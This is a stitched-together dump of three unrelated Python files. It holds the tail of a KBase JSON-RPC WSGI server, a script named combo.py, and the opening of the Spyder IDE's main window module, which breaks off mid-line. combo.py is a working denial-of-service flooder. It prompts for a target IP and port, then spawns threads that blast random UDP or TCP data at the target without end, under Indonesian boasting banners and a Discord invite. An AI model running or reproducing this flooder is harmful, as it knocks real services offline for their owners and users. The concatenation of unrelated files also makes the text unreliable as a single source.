self.method_authentication['jayrboltonContigFilter.filter_contigs'] = 'required' # noqa self.rpc_service.add(impl_jayrboltonContigFilter.status, name='jayrboltonContigFilter.status', types=[dict]) authurl = config.get(AUTH) if config else None self.auth_client = _KBaseAuth(authurl) def __call__(self, environ, start_response): # Context object, equivalent to the perl impl CallContext ctx = MethodContext(self.userlog) ctx['client_ip'] = getIPAddress(environ) status = '500 Internal Server Error' try: body_size = int(environ.get('CONTENT_LENGTH', 0)) except (ValueError): body_size = 0 if environ['REQUEST_METHOD'] == 'OPTIONS': # we basically do nothing and just return headers status = '200 OK' rpc_result = "" else: request_body = environ['wsgi.input'].read(body_size) try: req = json.loads(request_body) except ValueError as ve: err = {'error': {'code': -32700, 'name': "Parse error", 'message': str(ve), } } rpc_result = self.process_error(err, ctx, {'version': '1.1'}) else: ctx['module'], ctx['method'] = req['method'].split('.') ctx['call_id'] = req['id'] ctx['rpc_context'] = { 'call_stack': [{'time': self.now_in_utc(), 'method': req['method']} ] } prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params'] } ctx['provenance'] = [prov_action] try: token = environ.get('HTTP_AUTHORIZATION') # parse out the method being requested and check if it # has an authentication requirement method_name = req['method'] auth_req = self.method_authentication.get( method_name, 'none') if auth_req != 'none': if token is None and auth_req == 'required': err = JSONServerError() err.data = ( 'Authentication required for ' + 'jayrboltonContigFilter ' + 'but no authentication header was passed') raise err elif token is None and auth_req == 'optional': pass else: try: user = self.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token except Exception, e: if auth_req == 'required': err = JSONServerError() err.data = \ "Token validation failed: %s" % e raise err if (environ.get('HTTP_X_FORWARDED_FOR')): self.log(log.INFO, ctx, 'X-Forwarded-For: ' + environ.get('HTTP_X_FORWARDED_FOR')) self.log(log.INFO, ctx, 'start method') rpc_result = self.rpc_service.call(ctx, req) self.log(log.INFO, ctx, 'end method') status = '200 OK' except JSONRPCError as jre: err = {'error': {'code': jre.code, 'name': jre.message, 'message': jre.data } } trace = jre.trace if hasattr(jre, 'trace') else None rpc_result = self.process_error(err, ctx, req, trace) except Exception: err = {'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error ' + 'occurred', } } rpc_result = self.process_error(err, ctx, req, traceback.format_exc()) # print 'Request method was %s\n' % environ['REQUEST_METHOD'] # print 'Environment dictionary is:\n%s\n' % pprint.pformat(environ) # print 'Request body was: %s' % request_body # print 'Result from the method call is:\n%s\n' % \ # pprint.pformat(rpc_result) if rpc_result: response_body = rpc_result else: response_body = '' response_headers = [ ('Access-Control-Allow-Origin', '*'), ('Access-Control-Allow-Headers', environ.get( 'HTTP_ACCESS_CONTROL_REQUEST_HEADERS', 'authorization')), ('content-type', 'application/json'), ('content-length', str(len(response_body)))] start_response(status, response_headers) return [response_body] def process_error(self, error, context, request, trace=None): if trace: self.log(log.ERR, context, trace.split('\n')[0:-1]) if 'id' in request: error['id'] = request['id'] if 'version' in request: error['version'] = request['version'] e = error['error'].get('error') if not e: error['error']['error'] = trace elif 'jsonrpc' in request: error['jsonrpc'] = request['jsonrpc'] error['error']['data'] = trace else: error['version'] = '1.0' error['error']['error'] = trace return json.dumps(error) def now_in_utc(self): # noqa Taken from http://stackoverflow.com/questions/3401428/how-to-get-an-isoformat-datetime-string-including-the-default-timezone @IgnorePep8 dtnow = datetime.datetime.now() dtutcnow = datetime.datetime.utcnow() delta = dtnow - dtutcnow hh, mm = divmod((delta.days * 24 * 60 * 60 + delta.seconds + 30) // 60, 60) return "%s%+02d:%02d" % (dtnow.isoformat(), hh, mm) application = Application() # This is the uwsgi application dictionary. On startup uwsgi will look # for this dict and pull its configuration from here. # This simply lists where to "mount" the application in the URL path # # This uwsgi module "magically" appears when running the app within # uwsgi and is not available otherwise, so wrap an exception handler # around it # # To run this server in uwsgi with 4 workers listening on port 9999 use: # uwsgi -M -p 4 --http :9999 --wsgi-file _this_file_ # To run a using the single threaded python BaseHTTP service # listening on port 9999 by default execute this file # try: import uwsgi # Before we do anything with the application, see if the # configs specify patching all std routines to be asynch # *ONLY* use this if you are going to wrap the service in # a wsgi container that has enabled gevent, such as # uwsgi with the --gevent option if config is not None and config.get('gevent_monkeypatch_all', False): print "Monkeypatching std libraries for async" from gevent import monkey monkey.patch_all() uwsgi.applications = {'': application} except ImportError: # Not available outside of wsgi, ignore pass _proc = None def start_server(host='localhost', port=0, newprocess=False): ''' By default, will start the server on localhost on a system assigned port in the main thread. Excecution of the main thread will stay in the server main loop until interrupted. To run the server in a separate process, and thus allow the stop_server method to be called, set newprocess = True. This will also allow returning of the port number.''' global _proc if _proc: raise RuntimeError('server is already running') httpd = make_server(host, port, application) port = httpd.server_address[1] print "Listening on port %s" % port if newprocess: _proc = Process(target=httpd.serve_forever) _proc.daemon = True _proc.start() else: httpd.serve_forever() return port def stop_server(): global _proc _proc.terminate() _proc = None def process_async_cli(input_file_path, output_file_path, token): exit_code = 0 with open(input_file_path) as data_file: req = json.load(data_file) if 'version' not in req: req['version'] = '1.1' if 'id' not in req: req['id'] = str(_random.random())[2:] ctx = MethodContext(application.userlog) if token: user = application.auth_client.get_user(token) ctx['user_id'] = user ctx['authenticated'] = 1 ctx['token'] = token if 'context' in req: ctx['rpc_context'] = req['context'] ctx['CLI'] = 1 ctx['module'], ctx['method'] = req['method'].split('.') prov_action = {'service': ctx['module'], 'method': ctx['method'], 'method_params': req['params']} ctx['provenance'] = [prov_action] resp = None try: resp = application.rpc_service.call_py(ctx, req) except JSONRPCError as jre: trace = jre.trace if hasattr(jre, 'trace') else None resp = {'id': req['id'], 'version': req['version'], 'error': {'code': jre.code, 'name': jre.message, 'message': jre.data, 'error': trace} } except Exception: trace = traceback.format_exc() resp = {'id': req['id'], 'version': req['version'], 'error': {'code': 0, 'name': 'Unexpected Server Error', 'message': 'An unexpected server error occurred', 'error': trace} } if 'error' in resp: exit_code = 500 with open(output_file_path, "w") as f: f.write(json.dumps(resp, cls=JSONObjectEncoder)) return exit_code if __name__ == "__main__": if (len(sys.argv) >= 3 and len(sys.argv) <= 4 and os.path.isfile(sys.argv[1])): token = None if len(sys.argv) == 4: if os.path.isfile(sys.argv[3]): with open(sys.argv[3]) as token_file: token = token_file.read() else: token = sys.argv[3] sys.exit(process_async_cli(sys.argv[1], sys.argv[2], token)) try: opts, args = getopt(sys.argv[1:], "", ["port=", "host="]) except GetoptError as err: # print help information and exit: print str(err) # will print something like "option -a not recognized" sys.exit(2) port = 9999 host = 'localhost' for o, a in opts: if o == '--port': port = int(a) elif o == '--host': host = a print "Host set to %s" % host else: assert False, "unhandled option" start_server(host=host, port=port) # print "Listening on port %s" % port # httpd = make_server( host, port, application) # # httpd.serve_forever()
combo.py
#!/usr/bin/env python3 import random import socket import threading print (" - - > AUTHOR : XTraylinz CODE : XTraylinz < - - ") print (" - - > XTraylinz x XNextTime NIH BOS!! < - - ") print (" - - > AJARIN CUPU DONG BANG XIXI < - - ") print (" - - > XTraylinz#0965 & XNextTime#4668 <- - ") print (" - - > KALO MAU RENAME PM GUA DULU NGENTOD < - - ") print (" - - > PENCET LINK DIBAWAH AJG < - - ") print (" - - > https://discord.gg/CEbs6UFgga < - - ") print (" - - > GA JOIN = ANAK HARAM < - - ") ip = str(input(" Ip Nya:")) port = int(input(" Port Nya:")) choice = str(input(" HANCURIN GAK NICH? (y/n):")) times = int(input(" MAU BERAPA PAKET:")) threads = int(input(" KIRIM BERAPA BARANGNYA:")) def run(): data = random._urandom(1000) i = random.choice(("[+]","[-]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) addr = (str(ip),int(port)) for x in range(times): s.sendto(data,addr) print(i +" XTraylinz x XNextTime NIH BOS !! ") except: print("[!] GASUKA BAYWAN DECK") def run2(): data = random._urandom(16) i = random.choice(("[*]","[!]","[#]")) while True: try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((ip,port)) s.send(data) for x in range(times): s.send(data) print(i +" XTraylinz x XNextTime NIH BOS !! ") except: s.close() print("[*] GASUKA BAYWAN DECK") for y in range(threads): if choice == 'y': th = threading.Thread(target = run) th.start() else: th = threading.Thread(target = run2) th.start()
mainwindow.py
# -*- coding: utf-8 -*- # # Copyright © Spyder Project Contributors # Licensed under the terms of the MIT License # (see spyder/__init__.py for details) """ Spyder, the Scientific Python Development Environment ===================================================== Developped and maintained by the Spyder Project Contributors Copyright © Spyder Project Contributors Licensed under the terms of the MIT License (see spyder/__init__.py for details) """ # ============================================================================= # Stdlib imports # ============================================================================= from __future__ import print_function import errno import gc import logging import os import os.path as osp import re import signal import socket import subprocess import sys import threading import traceback import importlib logger = logging.getLogger(__name__) #============================================================================== # Keeping a reference to the original sys.exit before patching it #============================================================================== ORIGINAL_SYS_EXIT = sys.exit #============================================================================== # Check requirements #============================================================================== from spyder import requirements requirements.check_path() requirements.check_qt() requirements.check_spyder_kernels() #============================================================================== # Windows only: support for hiding console window when started with python.exe #============================================================================== set_attached_console_visible = None is_attached_console_visible = None set_windows_appusermodelid = None if os.name == 'nt': from spyder.utils.windows import (set_attached_console_visible, is_attached_console_visible, set_windows_appusermodelid) #============================================================================== # Workaround: importing rope.base.project here, otherwise this module can't # be imported if Spyder was executed from another folder than spyder #============================================================================== try: import rope.base.project # analysis:ignore except ImportError: pass #============================================================================== # Qt imports #============================================================================== from qtpy import API, PYQT5 from qtpy.compat import from_qvariant from qtpy.QtCore import (QByteArray, QCoreApplication, QPoint, QSize, Qt, QThread, QTimer, QUrl, Signal, Slot) from qtpy.QtGui import QColor, QDesktopServices, QIcon, QKeySequence, QPixmap from qtpy.QtWidgets import (QAction, QApplication, QDockWidget, QMainWindow, QMenu, QMessageBox, QShortcut, QSplashScreen, QStyleFactory, QWidget, QDesktopWidget) # Avoid a "Cannot mix incompatible Qt library" error on Windows platforms from qtpy import QtSvg # analysis:ignore # Avoid a bug in Qt: https://bugreports.qt.io/browse/QTBUG-46720 from qtpy import QtWebEngineWidgets # analysis:ignore # For issue 7447 try: from qtpy.QtQuick import QQuickWindow, QSGRendererInterface except Exception: QQuickWindow = QSGRendererInterface = None # To catch font errors in QtAwesome from qtawesome.iconic_font import FontError #============================================================================== # Proper high DPI scaling is available in Qt >= 5.6.0. This attibute must # be set before creating the application. #============================================================================== from spyder.config.main import CONF if hasattr(Qt, 'AA_EnableHighDpiScaling'): QCoreApplication.setAttribute(Qt.AA_EnableHighDpiScaling, CONF.get('main', 'high_dpi_scaling')) #============================================================================== # Create our QApplication instance here because it's needed to render the # splash screen created below #============================================================================== from spyder.utils.qthelpers import qapplication, MENU_SEPARATOR from spyder.config.base import get_image_path MAIN_APP = qapplication() if PYQT5: APP_ICON = QIcon(get_image_path("spyder.svg")) else: APP_ICON = QIcon(get_image_path("spyder.png")) MAIN_APP.setWindowIcon(APP_ICON) #============================================================================== # Create splash screen out of MainWindow to reduce perceived startup time. #============================================================================== from spyder.config.base import _, get_image_path, DEV, running_under_pytest if not running_under_pytest(): SPLASH = QSplashScreen(QPixmap(get_image_path('splash.svg'))) SPLASH_FONT = SPLASH.font() SPLASH_FONT.setPixelSize(10) SPLASH.setFont(SPLASH_FONT) SPLASH.show() SPLASH.showMessage(_("Initializing..."), Qt.AlignBottom | Qt.AlignCenter | Qt.AlignAbsolute, QColor(Qt.white)) QApplication.processEvents() else: SPLASH = None #============================================================================== # Local utility imports #============================================================================== from spyder import (__version__, __project_url__, __forum_url__, __trouble_url__, __website_url__, get_versions) from spyder.config.base import (get_conf_path, get_module_source_path, STDERR, get_debug_level, MAC_APP_NAME, get_home_dir, running_in_mac_app, get_module_path, reset_config_files) from spyder.config.main import OPEN_FILES_PORT from spyder.config.utils import IMPORT_EXT, is_gtk_desktop from spyder.app.cli_options import get_options from spyder import dependencies from spyder.py3compat import (is_text_string, to_text_string, PY3, qbytearray_to_str, configparser as cp) from spyder.utils import encoding, programs from spyder.utils import icon_manager as ima from spyder.utils.programs import is_module_installed from spyder.utils.misc import select_port, getcwd_or_home, get_python_executable from spyder.widgets.fileswitcher import FileSwitcher from spyder.plugins.help.utils.sphinxify import CSS_PATH, DARK_CSS_PATH from spyder.plugins.editor.lsp.manager import LSPManager from spyder.config.gui import is_dark_font_color #============================================================================== # Local gui imports #============================================================================== # NOTE: Move (if possible) import's of widgets and plugins exactly where they # are needed in MainWindow to speed up perceived startup time (i.e. the time # from clicking the Spyder icon to showing the splash screen). try: from spyder.utils.environ import WinUserEnvDialog except ImportError: WinUserEnvDialog = None # analysis:ignore from spyder.utils.qthelpers import (create_action, add_actions, get_icon, add_shortcut_to_tooltip, create_module_bookmark_actions, create_program_action, DialogManager, create_python_script_action, file_uri) from spyder.config.gui import get_shortcut from spyder.otherplugins import get_spyderplugins_mods from spyder.app import tour #============================================================================== # Third-party library imports #============================================================================== import qdarkstyle #============================================================================== # Get the cwd before initializing WorkingDirectory, which sets it to the one # used in the last session #============================================================================== CWD = getcwd_or_home() #============================================================================== # Utility functions #============================================================================== def get_python_doc_path(): """ Return Python documentation path (Windows: return the PythonXX.chm path if available) """ if os.name == 'nt': doc_path = osp.join(sys.prefix, "Doc") if not osp.isdir(doc_path): return python_chm = [path for path in os.listdir(doc_path) if re.match(r"(?i)Python[0-9]{3,6}.chm", path)] if python_chm: return file_uri(osp.join(doc_path, python_chm[0])) else: vinf = sys.version_info doc_path = '/usr/share/doc/python%d.%d/html' % (vinf[0], vinf[1]) python_doc = osp.join(doc_path, "index.html") if osp.isfile(python_doc): return file_uri(python_doc) def set_opengl_implementation(option): """ Set the OpenGL implementation used by Spyder. See issue 7447 for the details. """ if option == 'software': QCoreApplication.setAttribute(Qt.AA_UseSoftwareOpenGL) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.Software) elif option == 'desktop': QCoreApplication.setAttribute(Qt.AA_UseDesktopOpenGL) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL) elif option == 'gles': QCoreApplication.setAttribute(Qt.AA_UseOpenGLES) if QQuickWindow is not None: QQuickWindow.setSceneGraphBackend(QSGRendererInterface.OpenGL) def setup_logging(cli_options): """Setup logging with cli options defined by the user.""" if cli_options.debug_info or get_debug_level() > 0: levels = {2: logging.INFO, 3: logging.DEBUG} log_level = levels[get_debug_level()] log_format = '%(asctime)s [%(levelname)s] [%(name)s] -> %(message)s' if cli_options.debug_output == 'file': log_file = 'spyder-debug.log' else: log_file = None logging.basicConfig(level=log_level, format=log_format, filename=log_file, filemode='w+') # ============================================================================= # Dependencies # ============================================================================= QDARKSTYLE_REQVER = '>=2.6.4' dependencies.add("qdarkstyle", _("Dark style for the entire interface"), required_version=QDARKSTYLE_REQVER) #============================================================================== # Main Window #============================================================================== class MainWindow(QMainWindow): """Spyder main window""" DOCKOPTIONS = QMainWindow.AllowTabbedDocks|QMainWindow.AllowNestedDocks CURSORBLINK_OSDEFAULT = QApplication.cursorFlashTime() SPYDER_PATH = get_conf_path('path') SPYDER_NOT_ACTIVE_PATH = get_conf_path('not_active_path') BOOKMARKS = ( ('Python2', "https://docs.python.org/2/index.html", _("Python2 documentation")), ('Python3', "https://docs.python.org/3/index.html", _("Python3 documentation")), ('numpy', "https://docs.scipy.org/doc/", _("Numpy and Scipy documentation")), ('matplotlib', "https://matplotlib.org/contents.html", _("Matplotlib documentation")), ('PyQt5', "http://pyqt.sourceforge.net/Docs/PyQt5/", _("PyQt5 Reference Guide")), ('PyQt5', "http://pyqt.sourceforge.net/Docs/PyQt5/class_reference.html", _("PyQt5 API Reference")), ('winpython', "https://winpython.github.io/", _("WinPython")) ) DEFAULT_LAYOUTS = 4 # Signals restore_scrollbar_position = Signal() all_actions_defined = Signal() sig_pythonpath_changed = Signal() sig_open_external_file = Signal(str) sig_resized = Signal("QResizeEvent") # related to interactive tour sig_moved = Signal("QMoveEvent") # related to interactive tour def __init__(self, options=None): QMainWindow.__init__(self) qapp = QApplication.instance() if PYQT5: # Enabling scaling for high dpi qapp.setAttribute(Qt.AA_UseHighDpiPixmaps) self.default_style = str(qapp.style().objectName()) self.dialog_manager = DialogManager() self.init_workdir = options.working_directory self.profile = options.profile self.multithreaded = options.multithreaded self.new_instance = options.new_instance self.open_project = options.project self.window_title = options.window_title logger.info("Start of MainWindow constructor") def signal_handler(signum, frame=None): """Handler for signals.""" sys.stdout.write('Handling signal: %s\n' % signum) sys.stdout.flush() QApplication.quit() if os.name == "nt": try: import win32api win32api.SetConsoleCtrlHandler(signal_handler, True) except ImportError: pass else: signal.signal(signal.SIGTERM, signal_handler) if not DEV: # Make spyder quit when presing ctrl+C in the console # In DEV Ctrl+C doesn't quit, because it helps to # capture the traceback when spyder freezes signal.signal(signal.SIGINT, signal_handler) # Use a custom Qt stylesheet if sys.platform == 'darwin': spy_path = get_module_source_path('spyder') img_path = osp.join(spy_path, 'images') mac_style = open(osp.join(spy_path, 'app', 'mac_stylesheet.qss')).read() mac_style = mac_style.replace('$IMAGE_PATH', img_path) self.setStyleSheet(mac_style) # Shortcut management data self.shortcut_data = [] # Loading Spyder path self.path = [] self.not_active_path = [] self.project_path = [] if osp.isfile(self.SPYDER_PATH): self.path, _x = encoding.readlines(self.SPYDER_PATH) self.path = [name for name in self.path if osp.isdir(name)] if osp.isfile(self.SPYDER_NOT_ACTIVE_PATH): self.not_active_path, _x = \ encoding.readlines(self.SPYDER_NOT_ACTIVE_PATH) self.not_active_path = \ [name for name in self.not_active_path if osp.isdir(name)] self.remove_path_from_sys_path() self.add_path_to_sys_path() # Plugins self.console = None self.workingdirectory = None self.editor = None self.explorer = None self.help = None self.onlinehelp = None self.projects = None self.outlineexplorer = None self.historylog = None self.ipyconsole = None self.variableexplorer = None self.plots = None self.findinfiles = None self.thirdparty_plugins = [] # Tour # TODO: Should I consider it a plugin?? or? self.tour = None self.tours_available = None # File switcher self.fileswitcher = None # Check for updates Thread and Worker, refereces needed to prevent # segfaulting self.check_updates_action = None self.thread_updates = None self.worker_updates = None self.give_updates_feedback = True # Preferences from spyder.preferences.appearance import AppearanceConfigPage from spyder.preferences.general import MainConfigPage from spyder.preferences.shortcuts import ShortcutsConfigPage from spyder.preferences.runconfig import RunConfigPage from spyder.preferences.maininterpreter import MainInterpreterConfigPage from spyder.preferences.languageserver import LSPManagerConfigPage self.general_prefs = [MainConfigPage, AppearanceConfigPage, ShortcutsConfigPage, MainInterpreterConfigPage, RunConfigPage, LSPManagerConfigPage] self.prefs_index = None self.prefs_dialog_size = None # Quick Layouts and Dialogs from spyder.preferences.layoutdialog import (LayoutSaveDialog, LayoutSettingsDialog) self.dialog_layout_save = LayoutSaveDialog self.dialog_layout_settings = LayoutSettingsDialog # Actions self.lock_interface_action = None self.show_toolbars_action = None self.close_dockwidget_action = None self.undo_action = None self.redo_action = None self.copy_action = None self.cut_action = None self.paste_action = None self.selectall_action = None self.maximize_action = None self.fullscreen_action = None # Menu bars self.file_menu = None self.file_menu_actions = [] self.edit_menu = None self.edit_menu_actions = [] self.search_menu = None self.search_menu_actions = [] self.source_menu = None self.source_menu_actions = [] self.run_menu = None self.run_menu_actions = [] self.debug_menu = None self.debug_menu_actions = [] self.consoles_menu = None self.consoles_menu_actions = [] self.projects_menu = None self.projects_menu_actions = [] self.tools_menu = None self.tools_menu_actions = [] self.external_tools_menu = None # We must keep a reference to this, # otherwise the external tools menu is lost after leaving setup method self.external_tools_menu_actions = [] self.view_menu = None self.plugins_menu = None self.plugins_menu_actions = [] self.toolbars_menu = None self.help_menu = None self.help_menu_actions = [] # Status bar widgets self.mem_status = None self.cpu_status = None # Toolbars self.visible_toolbars = [] self.toolbarslist = [] self.main_toolbar = None self.main_toolbar_actions = [] self.file_toolbar = None self.file_toolbar_actions = [] self.edit_toolbar = None self.edit_toolbar_actions = [] self.search_toolbar = None self.search_toolbar_actions = [] self.source_toolbar = None self.source_toolbar_actions = [] self.run_toolbar = None self.run_toolbar_actions = [] self.debug_toolbar = None self.debug_toolbar_actions = [] self.layout_toolbar = None self.layout_toolbar_actions = [] if running_under_pytest(): # Show errors in internal console when testing. CONF.set('main', 'show_internal_errors', False) # Set window title self.set_window_title() if set_windows_appusermodelid != None: res = set_windows_appusermodelid() logger.info("appusermodelid: %s", res) # Setting QTimer if running in travis test_travis = os.environ.get('TEST_CI_APP', None) if test_travis is not None: global MAIN_APP timer_shutdown_time = 30000 self.timer_shutdown = QTimer(self) self.timer_shutdown.timeout.connect(MAIN_APP.quit) self.timer_shutdown.start(timer_shutdown_time) # Showing splash screen self.splash = SPLASH if CONF.get('main', 'current_version', '') != __version__: CONF.set('main', 'current_version', __version__) # Execute here the actions to be performed only once after # each update (there is nothing there for now, but it could # be useful some day...) # List of satellite widgets (registered in add_dockwidget): self.widgetlist = [] # Flags used if closing() is called by the exit() shell command self.already_closed = False self.is_starting_up = True self.is_setting_up = True self.interface_locked = CONF.get('main', 'panes_locked') self.floating_dockwidgets = [] self.window_size = None self.window_position = None self.state_before_maximizing = None self.current_quick_layout = None self.previous_layout_settings = None # TODO: related to quick layouts self.last_plugin = None self.fullscreen_flag = None # isFullscreen does not work as expected # The following flag remember the maximized state even when # the window is in fullscreen mode: self.maximized_flag = None # The following flag is used to restore window's geometry when # toggling out of fullscreen mode in Windows. self.saved_normal_geometry = None # To keep track of the last focused widget self.last_focused_widget = None self.previous_focused_widget = None # Server to open external files on a single instance # This is needed in order to handle socket creation problems. # See issue 4132 if os.name == 'nt': try: self.open_files_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) except OSError as e: self.open_files_server = None QMessageBox.warning(None, "Spyder", _("An error occurred while creating a socket needed " "by Spyder. Please, try to run as an Administrator " "from cmd.exe the following command and then " "restart your computer: <br><br><span " "style=\'color: #555555\'><b>netsh winsock reset" "</b></span><br>")) else: self.open_files_server = socket.socket(socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP) # Apply preferences self.apply_settings() # To set all dockwidgets tabs to be on top (in case we want to do it # in the future) # self.setTabPosition(Qt.AllDockWidgetAreas, QTabWidget.North) logger.info("End of MainWindow constructor") #---- Window setup def create_toolbar(self, title, object_name, iconsize=24): """Create and return toolbar with *title* and *object_name*""" toolbar = self.addToolBar(title) toolbar.setObjectName(object_name) toolbar.setIconSize(QSize(iconsize, iconsize)) self.toolbarslist.append(toolbar) return toolbar def setup(self): """Setup main window""" logger.info("*** Start of MainWindow setup ***") logger.info("Applying theme configuration...") ui_theme = CONF.get('appearance', 'ui_theme') color_scheme = CONF.get('appearance', 'selected') if ui_theme == 'dark': self.setStyleSheet(qdarkstyle.load_stylesheet_from_environment()) css_path = DARK_CSS_PATH elif ui_theme == 'automatic': if not is_dark_font_color(color_scheme): self.setStyleSheet( qdarkstyle.load_stylesheet_from_environment()) css_path = DARK_CSS_PATH else: css_path = CSS_PATH else: css_path = CSS_PATH logger.info("Creating core actions...") self.close_dockwidget_action = create_action( self, icon=ima.icon('close_pane'), text=_("Close current pane"), triggered=self.close_current_dockwidget, context=Qt.ApplicationShortcut ) self.register_shortcut(self.close_dockwidget_action, "_", "Close pane") self.lock_interface_action = create_action( self, _("Lock panes and toolbars"), toggled=self.toggle_lock, context=Qt.ApplicationShortcut) self.register_shortcut(self.lock_interface_action, "_", "Lock unlock panes") # custom layouts shortcuts self.toggle_next_layout_action = create_action(self, _("Use next layout"), triggered=self.toggle_next_layout, context=Qt.ApplicationShortcut) self.toggle_previous_layout_action = create_action(self, _("Use previous layout"), triggered=self.toggle_previous_layout, context=Qt.ApplicationShortcut) self.register_shortcut(self.toggle_next_layout_action, "_", "Use next layout") self.register_shortcut(self.toggle_previous_layout_action, "_", "Use previous layout") # File switcher shortcuts self.file_switcher_action = create_action( self, _('File switcher...'), icon=ima.icon('filelist'), tip=_('Fast switch between files'), triggered=self.open_fileswitcher, context=Qt.ApplicationShortcut) self.register_shortcut(self.file_switcher_action, context="_", name="File switcher") self.symbol_finder_action = create_action( self, _('Symbol finder...'), icon=ima.icon('symbol_find'), tip=_('Fast symbol search in file'), triggered=self.open_symbolfinder, context=Qt.ApplicationShortcut) self.register_shortcut(self.symbol_finder_action, context="_", name="symbol finder", add_sc_to_tip=True) self.file_toolbar_actions = [self.file_switcher_action, self.symbol_finder_action] def create_edit_action(text, tr_text, icon): textseq = text.split(' ') method_name = textseq[0].lower()+"".join(textseq[1:]) action = create_action(self, tr_text, icon=icon, triggered=self.global_callback, data=method_name, context=Qt.WidgetShortcut) self.register_shortcut(action, "Editor", text) return action self.undo_action = create_edit_action('Undo', _('Undo'), ima.icon('undo')) self.redo_action = create_edit_action('Redo', _('Redo'), ima.icon('redo')) self.copy_action = create_edit_action('Copy', _('Copy'), ima.icon('editcopy')) self.cut_action = create_edit_action('Cut', _('Cut'), ima.icon('editcut')) self.paste_action = create_edit_action('Paste', _('Paste'), ima.icon('editpaste')) self.selectall_action = create_edit_action("Select All", _("Select All"), ima.icon('selectall')) self.edit_menu_actions = [self.undo_action, self.redo_action, None, self.cut_action, self.copy_action, self.paste_action, self.selectall_action] namespace = None logger.info("Creating toolbars...") # File menu/toolbar self.file_menu = self.menuBar().addMenu(_("&File")) self.file_toolbar = self.create_toolbar(_("File toolbar"), "file_toolbar") # Edit menu/toolbar self.edit_menu = self.menuBar().addMenu(_("&Edit")) self.edit_toolbar = self.create_toolbar(_("Edit toolbar"), "edit_toolbar") # Search menu/toolbar self.search_menu = self.menuBar().addMenu(_("&Search")) self.search_toolbar = self.create_toolbar(_("Search toolbar"), "search_toolbar") # Source menu/toolbar self.source_menu = self.menuBar().addMenu(_("Sour&ce")) self.source_toolbar = self.create_toolbar(_("Source toolbar"), "source_toolbar") # Run menu/toolbar self.run_menu = self.menuBar().addMenu(_("&Run")) self.run_toolbar = self.create_toolbar(_("Run toolbar"), "run_toolbar") # Debug menu/toolbar self.debug_menu = self.menuBar().addMenu(_("&Debug")) self.debug_toolbar = self.create_toolbar(_("Debug toolbar"), "debug_toolbar") # Consoles menu/toolbar self.consoles_menu = self.menuBar().addMenu(_("C&onsoles")) self.consoles_menu.aboutToShow.connect( self.update_execution_state_kernel) # Projects menu self.projects_menu = self.menuBar().addMenu(_("&Projects")) self.projects_menu.aboutToShow.connect(self.valid_project) # Tools menu self.tools_menu = self.menuBar().addMenu(_("&Tools")) # View menu self.view_menu = self.menuBar().addMenu(_("&View")) # Help menu self.help_menu = self.menuBar().addMenu(_("&Help")) # Status bar status = self.statusBar() status.setObjectName("StatusBar") status.showMessage(_("Welcome to Spyder!"), 5000) logger.info("Creating Tools menu...") # Tools + External Tools prefs_action = create_action(self, _("Pre&ferences"), icon=ima.icon('configure'), triggered=self.edit_preferences, context=Qt.ApplicationShortcut) self.register_shortcut(prefs_action, "_", "Preferences", add_sc_to_tip=True) spyder_path_action = create_action(self, _("PYTHONPATH manager"), None, icon=ima.icon('pythonpath'), triggered=self.path_manager_callback, tip=_("Python Path Manager"), menurole=QAction.ApplicationSpecificRole) reset_spyder_action = create_action( self, _("Reset Spyder to factory defaults"), triggered=self.reset_spyder) self.tools_menu_actions = [prefs_action, spyder_path_action] if WinUserEnvDialog is not None: winenv_action = create_action(self, _("Current user environment variables..."), icon='win_env.png', tip=_("Show and edit current user environment " "variables in Windows registry " "(i.e. for all sessions)"), triggered=self.win_env) self.tools_menu_actions.append(winenv_action) self.tools_menu_actions += [MENU_SEPARATOR, reset_spyder_action] # External Tools submenu self.external_tools_menu = QMenu(_("External Tools")) self.external_tools_menu_actions = [] # WinPython control panel self.wp_action = create_action(self, _("WinPython control panel"), icon=get_icon('winpython.svg'), triggered=lambda: programs.run_python_script('winpython', 'controlpanel')) if os.name == 'nt' and is_module_installed('winpython'): self.external_tools_menu_actions.append(self.wp_action) # Qt-related tools additact = [] for name in ("designer-qt4", "designer"): qtdact = create_program_action(self, _("Qt Designer"), name) if qtdact: break for name in ("linguist-qt4", "linguist"): qtlact = create_program_action(self, _("Qt Linguist"), "linguist") if qtlact: break args = ['-no-opengl'] if os.name == 'nt' else [] for act in (qtdact, qtlact): if act: additact.append(act) if additact and is_module_installed('winpython'): self.external_tools_menu_actions += [None] + additact # Guidata and Sift logger.info("Creating guidata and sift entries...") gdgq_act = [] # Guidata and Guiqwt don't support PyQt5 yet and they fail # with an AssertionError when imported using those bindings # (see issue 2274) try: from guidata import configtools from guidata import config # analysis:ignore guidata_icon = configtools.get_icon('guidata.svg') guidata_act = create_python_script_action(self, _("guidata examples"), guidata_icon, "guidata", osp.join("tests", "__init__")) gdgq_act += [guidata_act] except: pass try: from guidata import configtools from guiqwt import config # analysis:ignore guiqwt_icon = configtools.get_icon('guiqwt.svg') guiqwt_act = create_python_script_action(self, _("guiqwt examples"), guiqwt_icon, "guiqwt", osp.join("tests", "__init__")) if guiqwt_act: gdgq_act += [guiqwt_act] sift_icon = configtools.get_icon('sift.svg') sift_act = create_python_script_action(self, _("Sift"), sift_icon, "guiqwt", osp.join("tests", "sift")) if sift_act: gdgq_act += [sift_act] except: pass if gdgq_act: self.external_tools_menu_actions += [None] + gdgq_act # Maximize current plugin self.maximize_action = create_action(self, '', triggered=self.maximize_dockwidget, context=Qt.ApplicationShortcut) self.register_shortcut(self.maximize_action, "_", "Maximize pane") self.__update_maximize_action() # Fullscreen mode self.fullscreen_action = create_action(self, _("Fullscreen mode"), triggered=self.toggle_fullscreen, context=Qt.ApplicationShortcut) self.register_shortcut(self.fullscreen_action, "_", "Fullscreen mode", add_sc_to_tip=True) # Main toolbar self.main_toolbar_actions = [self.maximize_action, self.fullscreen_action, None, prefs_action, spyder_path_action] self.main_toolbar = self.create_toolbar(_("Main toolbar"), "main_toolbar") # Internal console plugin logger.info("Loading internal console...") from spyder.plugins.console.plugin import Console self.console = 